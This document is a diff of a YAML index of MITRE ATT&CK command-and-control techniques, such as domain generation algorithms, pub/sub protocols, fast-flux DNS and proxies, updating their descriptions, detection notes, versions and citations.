-        Adversaries may make use of Domain Generation Algorithms (DGAs) to dynamically identify a destination domain for command and control traffic rather than relying on a list of static IP addresses or domains. This has the advantage of making it much harder for defenders to block, track, or take over the command and control channel, as there potentially could be thousands of domains that malware can check for instructions.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Unit 42 DGA Feb 2019)
-
-        DGAs can take the form of apparently random or “gibberish” strings (ex: istgmxdejdnxuyla.ru) when they construct domain names by generating each letter. Alternatively, some DGAs employ whole words as the unit by concatenating words together instead of letters (ex: cityjulydish.net). Many DGAs are time-based, generating a different domain for each time period (hourly, daily, monthly, etc). Others incorporate a seed value as well to make predicting future domains more difficult for defenders.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Talos CCleanup 2017)(Citation: Akamai DGA Mitigation)
-
-        Adversaries may use DGAs for the purpose of [Fallback Channels](https://attack.mitre.org/techniques/T1008). When contact is lost with the primary command and control server malware may employ a DGA as a means to reestablishing command and control.(Citation: Talos CCleanup 2017)(Citation: FireEye POSHSPY April 2017)(Citation: ESET Sednit 2017 Activity)
-      kill_chain_phases:
-      - kill_chain_name: mitre-attack
-        phase_name: command-and-control
-      x_mitre_detection: |-
-        Detecting dynamically generated domains can be challenging due to the number of different DGA algorithms, constantly evolving malware families, and the increasing complexity of the algorithms. There is a myriad of approaches for detecting a pseudo-randomly generated domain name, including using frequency analysis, Markov chains, entropy, proportion of dictionary words, ratio of vowels to other characters, and more.(Citation: Data Driven Security DGA) CDN domains may trigger these detections due to the format of their domain names. In addition to detecting a DGA domain based on the name, another more general approach for detecting a suspicious domain is to check for recently registered names or for rarely visited domains.
-
-        Machine learning approaches to detecting DGA domains have been developed and have seen success in applications. One approach is to use N-Gram methods to determine a randomness score for strings used in the domain name. If the randomness score is high, and the domains are not whitelisted (CDN, etc), then it may be determined if a domain is related to a legitimate host or DGA.(Citation: Pace University Detecting DGA May 2017) Another approach is to use deep learning to classify domains as DGA-generated.(Citation: Elastic Predicting DGA)
-      x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
+        url: https://datadrivensecurity.info/blog/posts/2014/Oct/dga-part2/
+      - source_name: Akamai DGA Mitigation
+        description: Liu, H. and Yuzifovich, Y. (2018, January 9). A Death Match of
+          Domain Generation Algorithms. Retrieved February 18, 2019.
+        url: https://medium.com/@yvyuz/a-death-match-of-domain-generation-algorithms-a5b5dbdc1c6e
+      - source_name: Cisco Umbrella DGA
+        description: Scarfo, A. (2016, October 10). Domain Generation Algorithms –
+          Why so effective?. Retrieved February 18, 2019.
+        url: https://umbrella.cisco.com/blog/2016/10/10/domain-generation-algorithms-effective/
+      - source_name: Cybereason Dissecting DGAs
+        description: 'Sternfeld, U. (2016). Dissecting Domain Generation Algorithms:
+          Eight Real World DGA Variants. Retrieved February 18, 2019.'
+        url: http://go.cybereason.com/rs/996-YZT-709/images/Cybereason-Lab-Analysis-Dissecting-DGAs-Eight-Real-World-DGA-Variants.pdf
+      - source_name: Unit 42 DGA Feb 2019
+        description: 'Unit 42. (2019, February 7). Threat Brief: Understanding Domain
+          Generation Algorithms (DGA). Retrieved February 19, 2019.'
+        url: https://unit42.paloaltonetworks.com/threat-brief-understanding-domain-generation-algorithms-dga/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      x_mitre_data_sources:
-      - 'Network Traffic: Network Traffic Flow'
-      x_mitre_permissions_required:
-      - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1071.004:
     technique:
@@ -40977,9 +41400,67 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1071.004
     atomic_tests: []
+  T1071.005:
+    technique:
+      modified: '2024-10-16T13:08:35.629Z'
+      name: Publish/Subscribe Protocols
+      description: "Adversaries may communicate using publish/subscribe (pub/sub)
+        application layer protocols to avoid detection/network filtering by blending
+        in with existing traffic. Commands to the remote system, and often the results
+        of those commands, will be embedded within the protocol traffic between the
+        client and server. \n\nProtocols such as <code>MQTT</code>, <code>XMPP</code>,
+        <code>AMQP</code>, and <code>STOMP</code> use a publish/subscribe design,
+        with message distribution managed by a centralized broker.(Citation: wailing
+        crab sub/pub)(Citation: Mandiant APT1 Appendix) Publishers categorize their
+        messages by topics, while subscribers receive messages according to their
+        subscribed topics.(Citation: wailing crab sub/pub) An adversary may abuse
+        publish/subscribe protocols to communicate with systems under their control
+        from behind a message broker while also mimicking normal, expected traffic."
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: command-and-control
+      x_mitre_contributors:
+      - Domenico Mazzaferro Palmeri
+      - Sofia Sanchez Margolles
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - macOS
+      - Linux
+      - Windows
+      - Network
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'Network Traffic: Network Traffic Flow'
+      - 'Network Traffic: Network Traffic Content'
+      type: attack-pattern
+      id: attack-pattern--241f9ea8-f6ae-4f38-92f5-cef5b7e539dd
+      created: '2024-08-28T14:14:18.512Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1071/005
+        external_id: T1071.005
+      - source_name: wailing crab sub/pub
+        description: Hammond, Charlotte. Villadsen, Ole. Metrick, Kat.. (2023, November
+          21). Stealthy WailingCrab Malware misuses MQTT Messaging Protocol. Retrieved
+          August 28, 2024.
+        url: https://securityintelligence.com/x-force/wailingcrab-malware-misues-mqtt-messaging-protocol/
+      - source_name: Mandiant APT1 Appendix
+        description: Mandiant. (n.d.). Appendix C (Digital) - The Malware Arsenal.
+          Retrieved July 18, 2016.
+        url: https://www.mandiant.com/sites/default/files/2021-09/mandiant-apt1-report.pdf
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
   T1573.001:
     technique:
       modified: '2023-12-26T20:58:19.356Z'
@@ -41025,7 +41506,6 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1568.001:
     technique:
@@ -41057,7 +41537,7 @@ command-and-control:
         url: https://www.welivesecurity.com/2017/01/12/fast-flux-networks-work/
         description: 'Albors, Josep. (2017, January 12). Fast Flux networks: What
           are they and how do they work?. Retrieved March 11, 2020.'
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-27T16:10:37.183Z'
       name: Fast Flux DNS
       description: |-
         Adversaries may use Fast Flux DNS to hide a command and control channel behind an array of rapidly changing IP addresses linked to a single domain resolution. This technique uses a fully qualified domain name, with multiple IP addresses assigned to it which are swapped with high frequency, using a combination of round robin IP addressing and short Time-To-Live (TTL) for a DNS resource record.(Citation: MehtaFastFluxPt1)(Citation: MehtaFastFluxPt2)(Citation: Fast Flux - Welivesecurity)
@@ -41079,22 +41559,20 @@ command-and-control:
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Flow'
       - 'Network Traffic: Network Connection Creation'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1071:
     technique:
-      modified: '2024-01-17T22:52:23.454Z'
+      modified: '2024-08-28T14:10:33.145Z'
       name: Application Layer Protocol
       description: "Adversaries may communicate using OSI application layer protocols
         to avoid detection/network filtering by blending in with existing traffic.
         Commands to the remote system, and often the results of those commands, will
         be embedded within the protocol traffic between the client and server. \n\nAdversaries
         may utilize many different protocols, including those used for web browsing,
-        transferring files, electronic mail, or DNS. For connections that occur internally
-        within an enclave (such as those between a proxy or pivot node and other nodes),
-        commonly used protocols are SMB, SSH, or RDP.(Citation: Mandiant APT29 Eye
-        Spy Email Nov 22) "
+        transferring files, electronic mail, DNS, or publishing/subscribing. For connections
+        that occur internally within an enclave (such as those between a proxy or
+        pivot node and other nodes), commonly used protocols are SMB, SSH, or RDP.(Citation:
+        Mandiant APT29 Eye Spy Email Nov 22) "
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: command-and-control
@@ -41116,7 +41594,7 @@ command-and-control:
       - macOS
       - Windows
       - Network
-      x_mitre_version: '2.2'
+      x_mitre_version: '2.3'
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Flow'
       - 'Network Traffic: Network Traffic Content'
@@ -41141,7 +41619,6 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1071
     atomic_tests: []
   T1219:
@@ -41225,7 +41702,6 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1219
     atomic_tests: []
   T1659:
@@ -41289,11 +41765,10 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1205:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-10-19T23:08:40.603Z'
       name: Traffic Signaling
       description: |-
         Adversaries may use traffic signaling to hide open ports or other malicious functionality used for persistence or command and control. Traffic signaling involves the use of a magic value or sequence that must be sent to a system to trigger a special response, such as opening a closed port or executing a malicious task. This may take the form of sending a series of packets with certain characteristics before a port will be opened that the adversary can use for command and control. Usually this series of packets consists of attempted connections to a predefined sequence of closed ports (i.e. [Port Knocking](https://attack.mitre.org/techniques/T1205/001)), but can involve unusual flags, specific strings, or other unique characteristics. After the sequence is completed, opening a port may be accomplished by the host-based firewall, but could also be implemented by custom software.
@@ -41377,7 +41852,6 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1572:
     technique:
@@ -41408,7 +41882,7 @@ command-and-control:
         description: Gardiner, J.,  Cova, M., Nagaraja, S. (2014, February). Command
           & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
         source_name: University of Birmingham C2
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-27T17:15:35.372Z'
       name: Protocol Tunneling
       description: "Adversaries may tunnel network communications to and from a victim
         system within a separate protocol to avoid detection/network filtering and/or
@@ -41428,8 +41902,8 @@ command-and-control:
         encapsulated within encrypted HTTPS packets.(Citation: BleepingComp Godlua
         JUL19) \n\nAdversaries may also leverage [Protocol Tunneling](https://attack.mitre.org/techniques/T1572)
         in conjunction with [Proxy](https://attack.mitre.org/techniques/T1090) and/or
-        [Protocol Impersonation](https://attack.mitre.org/techniques/T1001/003) to
-        further conceal C2 communications and infrastructure. "
+        [Protocol or Service Impersonation](https://attack.mitre.org/techniques/T1001/003)
+        to further conceal C2 communications and infrastructure. "
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: command-and-control
@@ -41451,8 +41925,6 @@ command-and-control:
       - 'Network Traffic: Network Traffic Content'
       - 'Network Traffic: Network Connection Creation'
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1572
     atomic_tests: []
   T1071.003:
@@ -41514,7 +41986,6 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1092:
     technique:
@@ -41562,7 +42033,6 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1090.002:
     technique:
@@ -41616,7 +42086,6 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1090:
     technique:
@@ -41649,7 +42118,7 @@ command-and-control:
         description: Gardiner, J.,  Cova, M., Nagaraja, S. (2014, February). Command
           & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
         source_name: University of Birmingham C2
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-08-30T19:16:11.648Z'
       name: Proxy
       description: |-
         Adversaries may use a connection proxy to direct network traffic between systems or act as an intermediary for network communications to a command and control server to avoid direct connections to their infrastructure. Many tools exist that enable traffic redirection through proxies or port redirection, including [HTRAN](https://attack.mitre.org/software/S0040), ZXProxy, and ZXPortMap. (Citation: Trend Micro APT Attack Tools) Adversaries use these types of proxies to manage command and control communications, reduce the number of simultaneous outbound network connections, provide resiliency in the face of connection loss, or to ride over existing trusted communications paths between victims to avoid suspicion. Adversaries may chain together multiple proxies to further disguise the source of malicious traffic.
@@ -41669,8 +42138,6 @@ command-and-control:
       - 'Network Traffic: Network Traffic Content'
       - 'Network Traffic: Network Connection Creation'
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1568:
     technique:
@@ -41708,7 +42175,7 @@ command-and-control:
         url: https://datadrivensecurity.info/blog/posts/2014/Oct/dga-part2/
         description: 'Jacobs, J. (2014, October 2). Building a DGA Classifier: Part
           2, Feature Engineering. Retrieved February 18, 2019.'
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-11T18:26:23.782Z'
       name: Dynamic Resolution
       description: |-
         Adversaries may dynamically establish connections to command and control infrastructure to evade common detections and remediations. This may be achieved by using malware that shares a common algorithm with the infrastructure the adversary uses to receive the malware's communications. These calculations can be used to dynamically adjust parameters such as the domain name, IP address, or port number the malware uses for command and control.
@@ -41736,42 +42203,22 @@ command-and-control:
       x_mitre_permissions_required:
       - User
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1102:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Anastasios Pingios
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--830c9528-df21-472c-8c14-a036bf17d665
-      type: attack-pattern
-      created: '2017-05-31T21:31:13.915Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1102
-        url: https://attack.mitre.org/techniques/T1102
-      - url: https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf
-        description: Gardiner, J.,  Cova, M., Nagaraja, S. (2014, February). Command
-          & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
-        source_name: University of Birmingham C2
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2024-10-07T17:53:54.380Z'
       name: Web Service
       description: |-
-        Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
+        Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites, cloud services, and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google, Microsoft, or Twitter, makes it easier for adversaries to hide in expected noise.(Citation: Broadcom BirdyClient Microsoft Graph API 2024) Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
 
         Use of Web services may also protect back-end C2 infrastructure from discovery through malware binary analysis while also enabling operational resiliency (since this infrastructure may be dynamically changed).
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: command-and-control
+      x_mitre_contributors:
+      - Anastasios Pingios
+      - Sarathkumar Rajendran, Microsoft Defender365
+      x_mitre_deprecated: false
       x_mitre_detection: 'Host data that can relate unknown or suspicious process
         activity using a network connection is important to supplement any existing
         indicators of compromise based on malware command and control signatures and
@@ -41780,17 +42227,39 @@ command-and-control:
         for uncommon data flows (e.g., a client sending significantly more data than
         it receives from a server). User behavior monitoring may help to detect abnormal
         patterns of activity.(Citation: University of Birmingham C2)'
-      x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      - Windows
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Flow'
       - 'Network Traffic: Network Traffic Content'
       - 'Network Traffic: Network Connection Creation'
-      x_mitre_permissions_required:
-      - User
-      x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--830c9528-df21-472c-8c14-a036bf17d665
+      created: '2017-05-31T21:31:13.915Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1102
+        external_id: T1102
+      - source_name: Broadcom BirdyClient Microsoft Graph API 2024
+        description: Broadcom. (2024, May 2). BirdyClient malware leverages Microsoft
+          Graph API for C&C communication. Retrieved July 1, 2024.
+        url: https://www.broadcom.com/support/security-center/protection-bulletin/birdyclient-malware-leverages-microsoft-graph-api-for-c-c-communication
+      - source_name: University of Birmingham C2
+        description: Gardiner, J.,  Cova, M., Nagaraja, S. (2014, February). Command
+          & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
+        url: https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1568.003:
     technique:
@@ -41822,7 +42291,7 @@ command-and-control:
         description: Rapid7. (2013, August 26). Upcoming G20 Summit Fuels Espionage
           Operations. Retrieved March 6, 2017.
         url: https://blog.rapid7.com/2013/08/26/upcoming-g20-summit-fuels-espionage-operations/
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-27T20:54:28.287Z'
       name: DNS Calculation
       description: |-
         Adversaries may perform calculations on addresses returned in DNS results to determine which port and IP address to use for command and control, rather than relying on a predetermined port number or the actual returned IP address. A IP and/or port number calculation can be used to bypass egress filtering on a C2 channel.(Citation: Meyers Numbered Panda)
@@ -41839,8 +42308,6 @@ command-and-control:
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Content'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1104:
     technique:
@@ -41860,7 +42327,7 @@ command-and-control:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1104
         external_id: T1104
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-07-14T19:43:38.181Z'
       name: Multi-Stage Channels
       description: |-
         Adversaries may create multiple stages for command and control that are employed under different conditions or for certain functions. Use of multiple stages may obfuscate the command and control channel to make detection more difficult.
@@ -41883,8 +42350,6 @@ command-and-control:
       - 'Network Traffic: Network Traffic Flow'
       - 'Network Traffic: Network Connection Creation'
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1205.001:
     technique:
@@ -41909,7 +42374,7 @@ command-and-control:
         description: 'Hartrell, Greg. (2002, August). Get a handle on cd00r: The invisible
           backdoor. Retrieved October 13, 2018.'
         source_name: Hartrell cd00r 2002
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-11T18:31:23.996Z'
       name: Port Knocking
       description: |-
         Adversaries may use port knocking to hide open ports used for persistence or command and control. To enable a port, an adversary sends a series of attempted connections to a predefined sequence of closed ports. After the sequence is completed, opening a port is often accomplished by the host based firewall, but could also be implemented by custom software.
@@ -41934,8 +42399,6 @@ command-and-control:
       - 'Network Traffic: Network Traffic Flow'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1071.002:
     technique:
@@ -42000,7 +42463,6 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1102.003:
     technique:
@@ -42024,7 +42486,7 @@ command-and-control:
         description: Gardiner, J.,  Cova, M., Nagaraja, S. (2014, February). Command
           & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
         source_name: University of Birmingham C2
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-26T23:26:10.109Z'
       name: One-Way Communication
       description: |-
         Adversaries may use an existing, legitimate external Web service as a means for sending commands to a compromised system without receiving return output over the Web service channel. Compromised systems may leverage popular websites and social media to host command and control (C2) instructions. Those infected systems may opt to send the output from those commands back over a different C2 channel, including to another distinct Web service. Alternatively, compromised systems may return no output at all in cases where adversaries want to send instructions to systems and do not want a response.
@@ -42049,21 +42511,36 @@ command-and-control:
       - 'Network Traffic: Network Traffic Content'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1090.003:
     technique:
-      modified: '2024-04-19T13:24:36.872Z'
+      modified: '2024-09-25T20:48:24.411Z'
       name: 'Proxy: Multi-hop Proxy'
-      description: |-
-        Adversaries may chain together multiple proxies to disguise the source of malicious traffic. Typically, a defender will be able to identify the last proxy traffic traversed before it enters their network; the defender may or may not be able to identify any previous proxies before the last-hop proxy. This technique makes identifying the original source of the malicious traffic even more difficult by requiring the defender to trace malicious traffic through several proxies to identify its source.
-
-        For example, adversaries may construct or use onion routing networks – such as the publicly available [Tor](https://attack.mitre.org/software/S0183) network – to transport encrypted C2 traffic through a compromised population, allowing communication with any device within the network.(Citation: Onion Routing)
-
-        In the case of network infrastructure, it is possible for an adversary to leverage multiple compromised devices to create a multi-hop proxy chain (i.e., [Network Devices](https://attack.mitre.org/techniques/T1584/008)). By leveraging [Patch System Image](https://attack.mitre.org/techniques/T1601/001) on routers, adversaries can add custom code to the affected network devices that will implement onion routing between those nodes. This method is dependent upon the [Network Boundary Bridging](https://attack.mitre.org/techniques/T1599) method allowing the adversaries to cross the protected network boundary of the Internet perimeter and into the organization’s Wide-Area Network (WAN).  Protocols such as ICMP may be used as a transport.
-
-        Similarly, adversaries may abuse peer-to-peer (P2P) and blockchain-oriented infrastructure to implement routing between a decentralized network of peers.(Citation: NGLite Trojan)
+      description: "Adversaries may chain together multiple proxies to disguise the
+        source of malicious traffic. Typically, a defender will be able to identify
+        the last proxy traffic traversed before it enters their network; the defender
+        may or may not be able to identify any previous proxies before the last-hop
+        proxy. This technique makes identifying the original source of the malicious
+        traffic even more difficult by requiring the defender to trace malicious traffic
+        through several proxies to identify its source.\n\nFor example, adversaries
+        may construct or use onion routing networks – such as the publicly available
+        [Tor](https://attack.mitre.org/software/S0183) network – to transport encrypted
+        C2 traffic through a compromised population, allowing communication with any
+        device within the network.(Citation: Onion Routing) Adversaries may also use
+        operational relay box (ORB) networks composed of virtual private servers (VPS),
+        Internet of Things (IoT) devices, smart devices, and end-of-life routers to
+        obfuscate their operations. (Citation: ORB Mandiant) \n\nIn the case of network
+        infrastructure, it is possible for an adversary to leverage multiple compromised
+        devices to create a multi-hop proxy chain (i.e., [Network Devices](https://attack.mitre.org/techniques/T1584/008)).
+        By leveraging [Patch System Image](https://attack.mitre.org/techniques/T1601/001)
+        on routers, adversaries can add custom code to the affected network devices
+        that will implement onion routing between those nodes. This method is dependent
+        upon the [Network Boundary Bridging](https://attack.mitre.org/techniques/T1599)
+        method allowing the adversaries to cross the protected network boundary of
+        the Internet perimeter and into the organization’s Wide-Area Network (WAN).
+        \ Protocols such as ICMP may be used as a transport.  \n\nSimilarly, adversaries
+        may abuse peer-to-peer (P2P) and blockchain-oriented infrastructure to implement
+        routing between a decentralized network of peers.(Citation: NGLite Trojan)"
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: command-and-control
@@ -42082,7 +42559,7 @@ command-and-control:
       - macOS
       - Windows
       - Network
-      x_mitre_version: '2.1'
+      x_mitre_version: '2.2'
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Flow'
       - 'Network Traffic: Network Traffic Content'
@@ -42096,6 +42573,11 @@ command-and-control:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1090/003
         external_id: T1090.003
+      - source_name: ORB Mandiant
+        description: Raggi, Michael. (2024, May 22). IOC Extinction? China-Nexus Cyber
+          Espionage Actors Use ORB Networks to Raise Cost on Defenders. Retrieved
+          July 8, 2024.
+        url: https://cloud.google.com/blog/topics/threat-intelligence/china-nexus-espionage-orb-networks
       - source_name: NGLite Trojan
         description: Robert Falcone, Jeff White, and Peter Renals. (2021, November
           7). Targeted Attack Campaign Against ManageEngine ADSelfService Plus Delivers
@@ -42109,7 +42591,6 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1090.003
     atomic_tests:
     - name: Tor Proxy Usage - MacOS
@@ -42140,7 +42621,7 @@ command-and-control:
         name: sh
   T1001:
     technique:
-      modified: '2024-02-02T19:04:35.389Z'
+      modified: '2024-10-07T15:07:47.232Z'
       name: Data Obfuscation
       description: 'Adversaries may obfuscate command and control traffic to make
         it more difficult to detect.(Citation: Bitdefender FunnyDream Campaign November
@@ -42190,11 +42671,10 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1571:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2024-09-12T19:37:57.868Z'
       name: Non-Standard Port
       description: |-
         Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088(Citation: Symantec Elfin Mar 2019) or port 587(Citation: Fortinet Agent Tesla April 2018) as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
@@ -42203,20 +42683,20 @@ command-and-control:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: command-and-control
+      x_mitre_deprecated: false
       x_mitre_detection: 'Analyze packet contents to detect communications that do
         not follow the expected protocol behavior for the port that is being used.
         Analyze network data for uncommon data flows (e.g., a client sending significantly
         more data than it receives from a server). Processes utilizing the network
         that do not normally have network communication or have never been seen before
         are suspicious.(Citation: University of Birmingham C2)'
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
       x_mitre_platforms:
       - Linux
       - macOS
       - Windows
-      x_mitre_is_subtechnique: false
-      x_mitre_deprecated: false
-      x_mitre_domains:
-      - enterprise-attack
       x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Flow'
@@ -42241,17 +42721,16 @@ command-and-control:
         url: https://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage
       - source_name: change_rdp_port_conti
         description: 'The DFIR Report. (2022, March 1). "Change RDP port" #ContiLeaks.
-          Retrieved March 1, 2022.'
-        url: https://twitter.com/TheDFIRReport/status/1498657772254240768
+          Retrieved September 12, 2024.'
+        url: https://x.com/TheDFIRReport/status/1498657772254240768
       - source_name: Fortinet Agent Tesla April 2018
         description: Zhang, X. (2018, April 05). Analysis of New Agent Tesla Spyware
           Variant. Retrieved November 5, 2018.
         url: https://www.fortinet.com/blog/threat-research/analysis-of-new-agent-tesla-spyware-variant.html
       object_marking_refs:
